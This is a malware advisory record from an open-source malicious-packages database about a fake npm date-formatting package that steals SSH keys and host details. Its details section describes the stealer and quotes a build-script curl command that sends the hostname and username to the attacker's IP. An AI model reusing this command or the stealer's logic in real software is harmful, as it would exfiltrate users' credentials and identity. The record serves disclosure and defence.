MAL-2026-5731

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang807/MAL-2026-5731.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5731
Published
2026-06-13T06:51:41Z
Modified
2026-06-13T07:31:43.703859774Z
Summary
Malicious code in houzidawang807 (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)

Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a build script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares build), so default npm install does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006305",
            "import_time": "2026-06-13T07:25:38.440254257Z",
            "sha256": "7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:41Z",
            "versions": [
                "1.1.6"
            ]
        },
        {
            "id": "IN-MAL-2026-006306",
            "versions": [
                "1.1.6"
            ],
            "sha256": "d87a9bdb30c6c4de17c6d4f01a94a84c0e597eee96f324082f880b9915c44498",
            "source": "amazon-inspector",
            "modified_time": "2026-06-13T06:51:42Z",
            "import_time": "2026-06-13T07:25:38.570142303Z"
        }
    ]
}

Affected packages

npm / houzidawang807

Affected versions

1.*
1.1.6

Database specific

cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "postinstall.js",
            "sha256": "01e2ae4c999c97c0deac72c7c36bbda5c0d81a95273d4cc5e7dd1dc6dc4596db",
            "tlsh": "033161d148f9ce304f3583952762c62af606fb23a106c640f7d80bea2fb299485d1ced"
        },
        {
            "path": "package.json",
            "sha256": "e721b12973f656430d0fef444292f2406109dcc93ef8d0d229372535cdbf5bd0",
            "tlsh": "1ce07d296f109c231bf082516d744b1bb9145f2f527c0c4bb17371086197a641068705"
        },
        {
            "path": "index.js",
            "sha256": "1d5404dbbd7f6a35142bc11e276bcff7b334f927a198399e6b0d9aa09ecfd098",
            "tlsh": "8cc08c94a716b2866326122096a74100be5cc2300b9a6a62b88ec0c00144c12805ef8c"
        }
    ],
    "package_integrity": [
        {
            "filename": "houzidawang807-1.1.6.tgz",
            "hashes": {
                "sha512_sri": "sha512-PRMbq5oBwQmIqH72r0lsFblInQfMoq29SGtqyjM51cjV9IwqRFSkZYAWhPE1hf+NrZwQkV+EvTI3OkK05MPtoQ==",
                "sha1": "6b19bae2d2e58544f2b233eb89718e61a2b13ebc"
            }
        }
    ],
    "ips": [
        "104.16.11.34"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/houzidawang807/MAL-2026-5731.json"